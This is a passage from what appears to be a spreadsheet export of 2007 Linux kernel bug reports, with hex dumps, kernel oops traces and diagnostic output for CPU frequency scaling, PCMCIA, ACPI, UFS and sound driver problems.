0a 01 00 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 01 00 00 00 01 00 00 00 ce d6 23 00 00 00 00 00 60: 01 68 02 00 00 00 00 00 05 78 80 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 10 00 01 00 80 04 58 02 80: 10 28 00 00 01 2d 01 00 48 00 01 01 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f:00.0 Ethernet controller: Broadcom Corporation Unknown device 167b (rev 02) Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, fast devsel, latency 0, IRQ 509 Memory at d0400000 (64-bit, non-prefetchable) [size=64K] Capabilities: [48] Power Management version 3 Capabilities: [50] Vital Product Data Capabilities: [58] Vendor Specific Information Capabilities: [e8] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable+ Capabilities: [d0] Express Endpoint IRQ 0 Capabilities: [100] Advanced Error Reporting Capabilities: [13c] Virtual Channel Capabilities: [160] Device Serial Number aa-a8-5e-fe-ff-bb-19-00 Capabilities: [16c] Power Budgeting 00: e4 14 7b 16 06 05 10 00 02 00 00 02 10 00 00 00 10: 04 00 40 d0 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 48 00 00 00 00 00 00 00 05 01 00 00 40: 00 00 00 00 00 00 00 00 01 50 03 c0 08 20 00 64 50: 03 58 00 00 98 82 88 02 09 e8 78 00 e3 bd 0c 95 60: 00 00 00 00 00 00 00 00 98 02 02 a0 00 00 18 76 70: f2 10 00 00 a0 00 00 00 20 70 00 00 00 00 00 00 80: 00 00 00 00 00 00 00 00 34 00 13 04 82 70 08 fc 90: 19 ba 00 01 00 00 00 28 00 00 00 00 ad 01 00 00 a0: 00 00 00 00 e5 00 00 00 00 00 00 00 16 00 00 00 b0: 00 00 00 00 00 00 00 5f 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 d0: 10 00 01 00 a0 8f 64 00 00 50 10 00 11 64 03 00 e0: 40 00 11 10 00 00 00 00 05 d0 81 00 0c 30 e0 fe f0: 00 00 00 00 81 41 00 00 00 00 00 00 00 00 00 00</t>
  </si>
  <si>
    <t>Frequency Scaling not working properly using powernow-k7</t>
  </si>
  <si>
    <t>2.6.19 and newer (up to 2.6.21-rc)</t>
  </si>
  <si>
    <t>2007-03-24 11:11 UTC</t>
  </si>
  <si>
    <t>Dustin Surawicz</t>
  </si>
  <si>
    <t>2007-06-29 16:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18 Distribution: Gentoo Linux 2006.1 Hardware Environment: i686 mobile AMD Athlon(tm) XP 1500+ AuthenticAMD GNU/Linux Problem Description: I've filed this bug already to Gentoo bugzilla (http://bugs.gentoo.org/show_bug.cgi?id=164802) and they asked me to post it here as well. Here is a copy of the bug description: ----------------snip-------------------- After switching to the newly stabilized gentoo-sources-2.6.19-r5 kernel, my CPU runs only on reduced speed: solaris dustin # cd /sys/devices/system/cpu/cpu0/cpufreq/ solaris cpufreq # cat cpuinfo_max_freq 1266768 solaris cpufreq # cat cpuinfo_cur_freq 933408 solaris cpufreq # cat scaling_available_frequencies 1266768 1000080 933408 800064 666720 solaris cpufreq # cat scaling_available_governors ondemand powersave userspace performance solaris cpufreq # cat scaling_governor performance solaris cpufreq # cat scaling_driver powernow-k7 solaris cpufreq # uname -a Linux solaris 2.6.19-gentoo-r5 #1 Wed Jan 31 23:49:21 CET 2007 i686 mobile AMD Athlon(tm) XP 1500+ AuthenticAMD GNU/Linux Although in performance mode, the CPU is running not at max. frequency. Switching to powersafe mode will reduce the frequency to minimum: solaris cpufreq # echo powersave &gt; scaling_governor solaris cpufreq # cat cpuinfo_cur_freq 666720 With ondemand, frequency stays at minimum until CPU load increases, but never exceeds 933408. With CONFIG_CPU_FREQ unset CPU runs at max frequency. ----------------snap-------------------- After I received some help from Gentoo developers, I was able to find the following lines in my dmesg.log, that seem to point to the problem: ----------------snip-------------------- powernow: Minimum speed 666 MHz. Maximum speed 1266 MHz. freq-table: setting show_table for cpu 0 to cec867e0 freq-table: table entry 0: 1266768 kHz, 3085 index freq-table: table entry 1: 1000080 kHz, 3593 index freq-table: table entry 2: 933408 kHz, 3592 index freq-table: table entry 3: 800064 kHz, 4358 index freq-table: table entry 4: 666720 kHz, 4868 index cpufreq-core: setting new policy for CPU 0: 666720 - 1266768 kHz freq-table: request for verification of policy (666720 - 1266768 kHz) for cpu 0 freq-table: verification lead to (666720 - 1266768 kHz) for cpu 0 freq-table: request for verification of policy (666720 - 950000 kHz) for cpu 0 freq-table: verification lead to (666720 - 950000 kHz) for cpu 0 cpufreq-core: new min and max freqs are 666720 - 950000 kHz It seems that after detecting the correct max speed and setting the correct policy, the max speed is reduced and again validated, which leads to an incorrect max speed. ----------------snap-------------------- Steps to reproduce 1. Configure kernel to use frequency scaling with powernow-k7 2. Compile kernel and reboot using the new kernel 3. Check CPU frequency I will attach the full log as well as my kernel config as well. BR, Dustin</t>
  </si>
  <si>
    <t>Nils Neumann</t>
  </si>
  <si>
    <t>PCMCIA: socket *** DANGER *** unable to remove socket power</t>
  </si>
  <si>
    <t>2.6.20.4</t>
  </si>
  <si>
    <t>2007-03-26 00:50 UTC</t>
  </si>
  <si>
    <t>2009-10-17 12:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: I don't know any. Distribution: Debian Etch Hardware Environment: Thinkpad T41p Software Environment: pccardctl eject Problem Description: The command "pccardctl eject" gives the following warning: kernel: PCMCIA: socket f793c428: *** DANGER *** unable to remove socket power It seems that this warning is wrong, because the pcmcia-card is offline. (LED is off.) Steps to reproduce: Inserting a pcmcia-card (I use the merlin u740.) and after this use "pccardctl eject". If I remove the card without pccardctl eject I get no warning from the kernel. cat /proc/iomem | grep -C1 yenta b0000000-b0000fff : 0000:02:00.0 b0000000-b0000fff : yenta_socket b1000000-b1000fff : 0000:02:00.1 b1000000-b1000fff : yenta_socket lspci -vv | grep -A14 Card 02:00.0 CardBus bridge: Texas Instruments PCI4520 PC card Cardbus Controller (rev 01) Subsystem: IBM Unknown device 0552 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 11 Region 0: Memory at b0000000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=03, subordinate=06, sec-latency=176 Memory window 0: e8000000-ebfff000 (prefetchable) Memory window 1: c4000000-c7fff000 I/O window 0: 00004000-000040ff I/O window 1: 00004400-000044ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite+ 16-bit legacy interface ports at 0001 02:00.1 CardBus bridge: Texas Instruments PCI4520 PC card Cardbus Controller (rev 01) Subsystem: IBM Unknown device 0552 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 11 Region 0: Memory at b1000000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=07, subordinate=07, sec-latency=176 Memory window 0: ec000000-effff000 (prefetchable) Memory window 1: c8000000-cbfff000 I/O window 0: 00004800-000048ff I/O window 1: 00004c00-00004cff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt- PostWrite+ 16-bit legacy interface ports at 0001 kernel: BIOS-e820: 00000000000dc000 - 0000000000100000 (reserved) kernel: BIOS-e820: 0000000000100000 - 000000003ff40000 (usable) kernel: BIOS-e820: 000000003ff40000 - 000000003ff52000 (ACPI data) kernel: BIOS-e820: 000000003ff52000 - 000000003ff54000 (ACPI NVS) kernel: BIOS-e820: 000000003ff80000 - 0000000040000000 (reserved) kernel: BIOS-e820: 00000000ff800000 - 0000000100000000 (reserved)</t>
  </si>
  <si>
    <t>pnp: Failed to activate device 00:0a - Samsung P35 XVM 1600 III</t>
  </si>
  <si>
    <t>2007-03-27 06:07 UTC</t>
  </si>
  <si>
    <t>2008-02-10 14:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: did occur since S3 works on P35 Distribution: Gentoo 2006.1 Hardware Environment: Samsung P35 XVM 1600 III Software Environment: Problem Description: After doing the 2nd resume cycle after S3 dmesg shows this: 1st S3: pnp: Device 00:08 disabled. pnp: Device 00:06 disabled. 1st Resume: Both gets activated. 2nd S3: pnp: Device 00:08 disabled. pnp: Device 00:06 disabled. 2nd Resume: pnp: Evaluate _CRS failed pnp: Failed to activate device 00:06. pnp: Evaluate _CRS failed pnp: Failed to activate device 00:08. pnp: Device 00:09 does not support activation. pnp: Failed to activate device 00:0a. For every S3 &amp; Resume again the last messages are there again. Also my irda (nsc_ircc) does not work anymore after second resume as the chip type is wrong now, at first boot its all ok. Steps to reproduce: Take a P35 and do two S3 &amp; Resume Cycles. Happens all the time. kind regards Torsten</t>
  </si>
  <si>
    <t>Synaptics driver "synaptics reset failed" during boot</t>
  </si>
  <si>
    <t>Ubuntu 2.6.20-13-generic</t>
  </si>
  <si>
    <t>2007-03-27 06:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: NA Distribution: Ubuntu Hardware Environment: HP Compaq nc6320 (Laptop PC) Software Environment: Boot time Problem Description: Dmesg errors, "synaptics reset failed" (x3) during boot. Doesn't appear critical to mouse operation, however mouse sometimes looses its config when switching X-Servers. (Will stop working when launching a new x-server, but flicking back to the old one, then forward again will make it work. Often it changes the "gain" of the motion though). This could be an unrelated problem in the X driver of course. Steps to reproduce: Boot. Having dug a little into the code with printk's, I think that we're seeing a timeout in i8042.c, in i8042_interrupt(). It hits in psmouse-base.c, psmouse_interrupt() and calls ps2_cmd_aborted - killing the waiting (extended) timeouts for the reset command in libps2.c's ps2_command(). I'm not sure if the timeout is a real hardware timeout specific to the i8042, or embedded controller implementation in this laptop. Has anyone else seen the bug? Regards, Peter Clifton</t>
  </si>
  <si>
    <t>2007-03-28 10:13 UTC</t>
  </si>
  <si>
    <t>Jim Paris</t>
  </si>
  <si>
    <t>2007-08-12 09:31 UTC</t>
  </si>
  <si>
    <t>Evgeniy A. Dushistov</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Debian Hardware Environment: x86_64 SMP Software Environment: Problem Description: Steps to reproduce: $ file fs.img fs.img: Unix Fast File system [v2] (big-endian) last mounted on /cell_mw_cfs, last written at Sun Mar 25 05:49:34 2007, clean flag 1, readonly flag 0, number of blocks 5242878, number of data blocks 5077077, number of cylinder groups 56, block size 16384, fragment size 2048, average file size 16384, average number of files in dir 64, pending blocks to free 0, pending inodes to free 0, system-wide uuid 0, minimum percentage of free blocks 8, TIME optimization $ mount -o loop,ufstype=ufs2,ro fs.img tmp/ $ find tmp/ Hits a few errors, dmesg gets some stuff: [827280.036853] UFS-fs error (device loop1): ufs_check_page: bad entry in directory #141312: unaligned directory entry - offset=0, rec_len=61846, name_len=144 [827280.036917] UFS-fs error (device loop1): ufs_readdir: bad page in #141312 [827280.054615] UFS-fs error (device loop1): ufs_read_inode: inode 6 has zero nlink [827280.054616] [827280.054662] init_special_inode: bogus i_mode (0) [827280.054691] UFS-fs error (device loop1): ufs_read_inode: inode 8 has zero nlink [827280.054692] [827280.054736] init_special_inode: bogus i_mode (0) [827280.054755] UFS-fs error (device loop1): ufs_read_inode: inode 10 has zero nlink [827280.054756] [827280.054800] init_special_inode: bogus i_mode (0) [827280.054817] UFS-fs error (device loop1): ufs_read_inode: inode 11 has zero nlink [827280.054819] [827280.054863] init_special_inode: bogus i_mode (0) [827280.054882] UFS-fs error (device loop1): ufs_read_inode: inode 12 has zero nlink [827280.054883] [827280.054927] init_special_inode: bogus i_mode (0) [827280.054946] UFS-fs error (device loop1): ufs_read_inode: inode 15 has zero nlink [827280.054947] [827280.054991] init_special_inode: bogus i_mode (0) [827280.055019] UFS-fs error (device loop1): ufs_read_inode: inode 20 has zero nlink [827280.055021] [827280.055065] init_special_inode: bogus i_mode (0) [827280.055083] UFS-fs error (device loop1): ufs_read_inode: inode 22 has zero nlink [827280.055084] [827280.055128] init_special_inode: bogus i_mode (0) [827280.084792] UFS-fs error (device loop1): ufs_read_inode: inode 23561 has zero nlink [827280.084793] [827280.084842] init_special_inode: bogus i_mode (0) [827280.084863] UFS-fs error (device loop1): ufs_read_inode: inode 23562 has zero nlink [827280.084865] [827280.084910] init_special_inode: bogus i_mode (0) [827280.084930] UFS-fs error (device loop1): ufs_read_inode: inode 23563 has zero nlink [827280.084931] [827280.084975] init_special_inode: bogus i_mode (0) [827280.084993] UFS-fs error (device loop1): ufs_read_inode: inode 23564 has zero nlink [827280.084995] [827280.085039] init_special_inode: bogus i_mode (0) [827280.085056] UFS-fs error (device loop1): ufs_read_inode: inode 23565 has zero nlink [827280.085058] [827280.085102] init_special_inode: bogus i_mode (0) [827280.086067] UFS-fs error (device loop1): ufs_check_page: bad entry in directory #1248485: unaligned directory entry - offset=0, rec_len=56645, name_len=252 [827280.086124] UFS-fs error (device loop1): ufs_readdir: bad page in #1248485 [827280.086471] UFS-fs error (device loop1): ufs_check_page: bad entry in directory #1271989: directory entry across blocks - offset=0, rec_len=52012, name_len=245 [827280.086543] UFS-fs error (device loop1): ufs_readdir: bad page in #1271989 [827280.086725] UFS-fs error (device loop1): ufs_read_inode: inode 23603 has zero nlink [827280.086727] [827280.086771] init_special_inode: bogus i_mode (0) [827280.117270] UFS-fs error (device loop1): ufs_read_inode: inode 94208 has zero nlink [827280.117272] [827280.117317] init_special_inode: bogus i_mode (0) [827280.241836] UFS-fs error (device loop1): ufs_check_page: bad entry in directory #423936: directory entry across blocks - offset=0, rec_len=65280, name_len=0 [827280.241894] UFS-fs error (device loop1): ufs_readdir: bad page in #423936 [827280.355618] UFS-fs error (device loop1): ufs_read_inode: inode 541696 has zero nlink [827280.355620] [827280.355666] init_special_inode: bogus i_mode (0) That part is not completely unexpected, it might be corrupted or have some non-standard structure. But, on unmounting the filesystem, [827297.979496] Unable to handle kernel NULL pointer dereference at 00000000000000b8 RIP: [827297.979514] [&lt;ffffffff88393735&gt;] :ufs:ufs_read_cylinder+0x41/0x2c5 [827297.979585] PGD b40cf067 PUD b34e9067 PMD 0 [827297.979615] Oops: 0000 [1] SMP [827297.979641] CPU 0 [827297.979663] Modules linked in: ufs nls_iso8859_1 isofs i2c_isa w83793 hwmon_vid nfs nfsd exportfs lockd nfs_acl sunrpc button ac battery ipv6 iptable_raw xt_policy xt_multiport ipt_ULOG ipt_TTL ipt_ttl ipt_TOS ipt_tos ipt_TCPMSS ipt_SAME ipt_REJECT ipt_REDIRECT ipt_recent ipt_owner ipt_NETMAP ipt_MASQUERADE ipt_LOG ipt_iprange ipt_ECN ipt_ecn ipt_ah ipt_addrtype xt_tcpmss xt_pkttype xt_physdev xt_NFQUEUE xt_MARK xt_mark xt_mac xt_limit xt_length xt_helper xt_dccp xt_conntrack xt_CLASSIFY xt_tcpudp xt_state iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack iptable_mangle nfnetlink iptable_filter ip_tables x_tables raid456 xor kvm_intel kvm fuse loop evdev parport_pc parport shpchp pci_hotplug floppy i2c_i801 i2c_core pcspkr ext3 jbd mbcache dm_mirror dm_snapshot dm_mod raid1 md_mod ide_generic ata_generic ata_piix sd_mod piix generic ide_core ahci sata_sil24 e1000 ehci_hcd uhci_hcd thermal processor fan [827297.980157] Pid: 11019, comm: umount Not tainted 2.6.20.1 #1 [827297.980185] RIP: 0010:[&lt;ffffffff88393735&gt;] [&lt;ffffffff88393735&gt;] :ufs:ufs_read_cylinder+0x41/0x2c5 [827297.980238] RSP: 0018:ffff810024ad9d08 EFLAGS: 00010246 [827297.980265] RAX: 0000000000000000 RBX: ffff81013939ac00 RCX: 0000000000000000 [827297.980309] RDX: 0000000000000000 RSI: ffff81013b4e5c00 RDI: 00000000000000b8 [827297.980353] RBP: 0000000000000000 R08: 0000000000000024 R09: 0000000000000000 [827297.980397] R10: ffff81013cf5e528 R11: 00000000fffffffa R12: ffff810136a4b800 [827297.980442] R13: ffff810136a4b800 R14: ffff81013939ac00 R15: 0000000000000017 [827297.980487] FS: 00002ace8cbed1d0(0000) GS:ffffffff804fb000(0000) knlGS:0000000000000000 [827297.980532] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [827297.980560] CR2: 00000000000000b8 CR3: 00000000b34f6000 CR4: 00000000000026e0 [827297.980605] Process umount (pid: 11019, threadinfo ffff810024ad8000, task ffff81013b42b040) [827297.980650] Stack: ffff810100000000 ffff81013939ac00 ffff810025753a18 0000000000000017 [827297.980705] ffff810136a4b800 0000000000513c20 0000000000005c00 ffffffff88393bc2 [827297.980756] ffff810025753a18 0000000000084400 ffff810025753a18 ffff810136a4b800 [827297.980790] Call Trace: [827297.980836] [&lt;ffffffff88393bc2&gt;] :ufs:ufs_load_cylinder+0x12c/0x13a [827297.980872] [&lt;ffffffff8839511b&gt;] :ufs:ufs_free_inode+0x8f/0x308 [827297.980908] [&lt;ffffffff88395dee&gt;] :ufs:ufs_delete_inode+0x0/0x93 [827297.980942] [&lt;ffffffff88395e7b&gt;] :ufs:ufs_delete_inode+0x8d/0x93 [827297.980974] [&lt;ffffffff8022c05e&gt;] generic_delete_inode+0xc0/0x136 [827297.981007] [&lt;ffffffff802c0999&gt;] shrink_dcache_for_umount_subtree+0x203/0x250 [827297.981055] [&lt;ffffffff802c0e95&gt;] shrink_dcache_for_umount+0x2f/0x3d [827297.981087] [&lt;ffffffff802bac62&gt;] generic_shutdown_super+0x19/0xf1 [827297.981119] [&lt;ffffffff802bad60&gt;] kill_block_super+0x26/0x3b [827297.981149] [&lt;ffffffff802bae2f&gt;] deactivate_super+0x6a/0x83 [827297.981180] [&lt;ffffffff802c2e0f&gt;] sys_umount+0x247/0x27d [827297.981212] [&lt;ffffffff802215d3&gt;] sys_newstat+0x19/0x31 [827297.981250] [&lt;ffffffff8025611e&gt;] system_call+0x7e/0x83 [827297.981284] [827297.981303] [827297.981304] Code: 48 8b 04 38 4c 8b 68 28 75 0c 44 89 f8 0f af 86 14 01 00 00 [827297.981404] RIP [&lt;ffffffff88393735&gt;] :ufs:ufs_read_cylinder+0x41/0x2c5 [827297.981438] RSP &lt;ffff810024ad9d08&gt; [827297.981461] CR2: 00000000000000b8 [827297.981821] BUG: at kernel/exit.c:860 do_exit() [827297.981939] [827297.981940] Call Trace: [827297.982067] [&lt;ffffffff802135ca&gt;] do_exit+0x51/0x7ff [827297.982138] [&lt;ffffffff8025c84b&gt;] _spin_unlock_irqrestore+0x8/0x9 [827297.982213] [&lt;ffffffff8020aa0b&gt;] do_page_fault+0x72d/0x7ad [827297.982291] [&lt;ffffffff802371dd&gt;] d_instantiate+0x52/0x8a [827297.982362] [&lt;ffffffff8023c61c&gt;] d_rehash+0x21/0x34 [827297.982432] [&lt;ffffffff8022d703&gt;] d_splice_alias+0x114/0x11c [827297.982511] [&lt;ffffffff8025c9fd&gt;] error_exit+0x0/0x84 [827297.982592] [&lt;ffffffff88393735&gt;] :ufs:ufs_read_cylinder+0x41/0x2c5 [827297.982673] [&lt;ffffffff88393bc2&gt;] :ufs:ufs_load_cylinder+0x12c/0x13a [827297.982753] [&lt;ffffffff8839511b&gt;] :ufs:ufs_free_inode+0x8f/0x308 [827297.982832] [&lt;ffffffff88395dee&gt;] :ufs:ufs_delete_inode+0x0/0x93 [827297.982908] [&lt;ffffffff88395e7b&gt;] :ufs:ufs_delete_inode+0x8d/0x93 [827297.982981] [&lt;ffffffff8022c05e&gt;] generic_delete_inode+0xc0/0x136 [827297.983054] [&lt;ffffffff802c0999&gt;] shrink_dcache_for_umount_subtree+0x203/0x250 [827297.983145] [&lt;ffffffff802c0e95&gt;] shrink_dcache_for_umount+0x2f/0x3d [827297.983218] [&lt;ffffffff802bac62&gt;] generic_shutdown_super+0x19/0xf1 [827297.983292] [&lt;ffffffff802bad60&gt;] kill_block_super+0x26/0x3b [827297.983365] [&lt;ffffffff802bae2f&gt;] deactivate_super+0x6a/0x83 [827297.983437] [&lt;ffffffff802c2e0f&gt;] sys_umount+0x247/0x27d [827297.983512] [&lt;ffffffff802215d3&gt;] sys_newstat+0x19/0x31 [827297.983591] [&lt;ffffffff8025611e&gt;] system_call+0x7e/0x83 A friend tells me that he got an oops doing the same thing on a 32-bit UP system, but I'm not sure the exact kernel version (probably 2.6.18).</t>
  </si>
  <si>
    <t>Duplicate MADT: no ACPI events if 2nd MADT used - HP dv1240us</t>
  </si>
  <si>
    <t>2007-03-29 13:24 UTC</t>
  </si>
  <si>
    <t>2007-03-30 21:21 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Ubuntu 7.04 development packages Hardware Environment: Model: HP dv1240us 00:00.0 Host bridge: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:00.1 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:00.3 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) 00:02.1 Display controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 83) 00:1f.0 ISA bridge: Intel Corporation 82801DBM (ICH4-M) LPC Interface Bridge (rev 03) 00:1f.1 IDE interface: Intel Corporation 82801DBM (ICH4-M) IDE Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Controller (rev 03) 00:1f.5 Multimedia audio controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 03) 00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Modem Controller (rev 03) 01:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 01:06.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05) 01:09.0 CardBus bridge: Texas Instruments PCIxx21/x515 Cardbus Controller 01:09.2 FireWire (IEEE 1394): Texas Instruments OHCI Compliant IEEE 1394 Host Controller 01:09.3 Mass storage controller: Texas Instruments PCIxx21 Integrated FlashMedia Controller 01:09.4 Generic system peripheral [0805]: Texas Instruments PCI6411/6421/6611/6621/7411/7421/7611/7621 Secure Digital Controller Software Environment: Problem Description: 1. Power always shows up as plugged in to AC. 2. The lid button is non-operational for initiating a suspend. 3. Suspending from the Gnome shutdown menu works. Afterwards, the lid button works for resuming from suspend. 4. If I suspend, resume and then try to shutdown; when I see the message "The machine will now halt" the power does not shut off. That is, the various buttons on my laptop stay lit up. I am forced to shutdown by holding down the power button for five seconds. Steps to reproduce: Notice that the unplugged laptop power applet shows that the machine has AC power. Try closing lid to trigger a suspend. Suspend from the Quit menu. Unsuspend by pressing the laptop lid button and releasing. Shutdown the machine, noticing that the power doesn't turn off after halt.</t>
  </si>
  <si>
    <t>acpi logs flood by "processor CPU1" events</t>
  </si>
  <si>
    <t>2.6.19-gentoo-r5, 2.6.20-gentoo-r4 , 2.6.21-rc5</t>
  </si>
  <si>
    <t>2007-03-31 03:00 UTC</t>
  </si>
  <si>
    <t>Michalis Giannakidis</t>
  </si>
  <si>
    <t>2008-05-16 13:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: unknown Distribution: gentoo Linux Hardware Environment: i686 Intel(R) Pentium(R) M processor Software Environment: gentoo Linux Problem Description: System logs (/var/log/acpi ) floods with messages like 'received event "processor CPU1 00000080 00000004"'. Seems to be coming from CONFIG_ACPI_PROCESSOR Steps to reproduce: (The following messages are form 2.6.19-gentoo-r5, but the same also occurs under 2.6.21-rc5) When I compile the kernel to use CONFIG_ACPI_PROCESSOR: | Prompt: Processor &amp;#9474; Defined at drivers/acpi/Kconfig:141 &amp;#9474; Depends on: !X86_VOYAGER &amp;&amp; !X86_VISWS &amp;&amp; !IA64_HP_SIM &amp;&amp; (IA64 || X8 &amp;#9474; Location: &amp;#9474; -&gt; Power management options (ACPI, APM) &amp;#9474; -&gt; ACPI (Advanced Configuration and Power Interface) Support &amp;#9474; -&gt; ACPI Support (ACPI [=y] and CPU Frequency scaling (module: speedstep_centrino) system logs (/var/log/acpi ) floods with event messages. Actual Results: [Fri Mar 23 00:22:36 2007] received event "processor CPU1 00000080 00000004" [Fri Mar 23 00:22:36 2007] notifying client 5512[103:409] [Fri Mar 23 00:22:36 2007] notifying client 5785[0:0] [Fri Mar 23 00:22:36 2007] executing action "/etc/acpi/default.sh processor CPU1 00000080 00000004" [Fri Mar 23 00:22:36 2007] BEGIN HANDLER MESSAGES [Fri Mar 23 00:22:36 2007] END HANDLER MESSAGES [Fri Mar 23 00:22:36 2007] action exited with status 0 [Fri Mar 23 00:22:36 2007] completed event "processor CPU1 00000080 00000004" [Fri Mar 23 00:22:52 2007] received event "processor CPU1 00000080 00000004" [Fri Mar 23 00:22:52 2007] notifying client 5512[103:409] [Fri Mar 23 00:22:52 2007] notifying client 5785[0:0] [Fri Mar 23 00:22:52 2007] executing action "/etc/acpi/default.sh processor CPU1 00000080 00000004" [Fri Mar 23 00:22:52 2007] BEGIN HANDLER MESSAGES [Fri Mar 23 00:22:52 2007] END HANDLER MESSAGES [Fri Mar 23 00:22:52 2007] action exited with status 0 [Fri Mar 23 00:22:52 2007] completed event "processor CPU1 00000080 00000004" ACPI Processor seems to be needed for speedstep_centrino and CPU frequency scaling to work. Removing ACPI Processor support stops the messages, and brakes speedstep_centrino. The same bug has also been reported in gentoo bugzilla: http://bugs.gentoo.org/show_bug.cgi?id=171860</t>
  </si>
  <si>
    <t>sound stops occasionally for a moment without reason</t>
  </si>
  <si>
    <t>Linux boborjan 2.6.17.6-10 #1 SMP Wed Mar 14 19:21:08 CET 2007 i</t>
  </si>
  <si>
    <t>2007-04-01 13:45 UTC</t>
  </si>
  <si>
    <t>2008-09-23 13:07 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: don't know even if it exists Distribution: UHU-Linux Hardware Environment: Mobile AMD Athlon(tm) 64 Processor 3000+ CPU (but 32 bit OS), VIA 82xx Audio Software Environment: mplayer, bmpx, I can reproduce with anything Problem Description: once in 2-3 minute the sound stops for 0.1-0.3 seconds. Steps to reproduce: just invoke mplayer *.mp3 # lsmod |grep snd snd_pcm_oss 37280 0 snd_mixer_oss 18048 1 snd_pcm_oss snd_via82xx 25240 0 gameport 14600 1 snd_via82xx snd_via82xx_modem 14600 0 snd_ac97_codec 83744 2 snd_via82xx,snd_via82xx_modem snd_ac97_bus 6016 1 snd_ac97_codec snd_mpu401_uart 9600 1 snd_via82xx snd_rawmidi 21664 1 snd_mpu401_uart snd_seq_device 9996 1 snd_rawmidi snd_pcm 71300 4 snd_pcm_oss,snd_via82xx,snd_via82xx_modem,snd_ac97_codec snd_timer 21636 1 snd_pcm snd_page_alloc 11144 3 snd_via82xx,snd_via82xx_modem,snd_pcm snd 44260 10 snd_pcm_oss,snd_mixer_oss,snd_via82xx,snd_via82xx_modem,snd_ac97_codec,snd_mpu401_uart,snd_rawmidi,snd_seq_device,snd_pcm,snd_timer soundcore 10848 1 snd No log entries, how can I enable sound driver debug mode, or what should I do to get more details?</t>
  </si>
  <si>
    <t>LCD always max brightness after unlocking X - ThinkPad R52</t>
  </si>
  <si>
    <t>2007-04-01 17:00 UTC</t>
  </si>
  <si>
    <t>Pip</t>
  </si>
  <si>
    <t>2007-09-17 09:45 UTC</t>
  </si>
  <si>
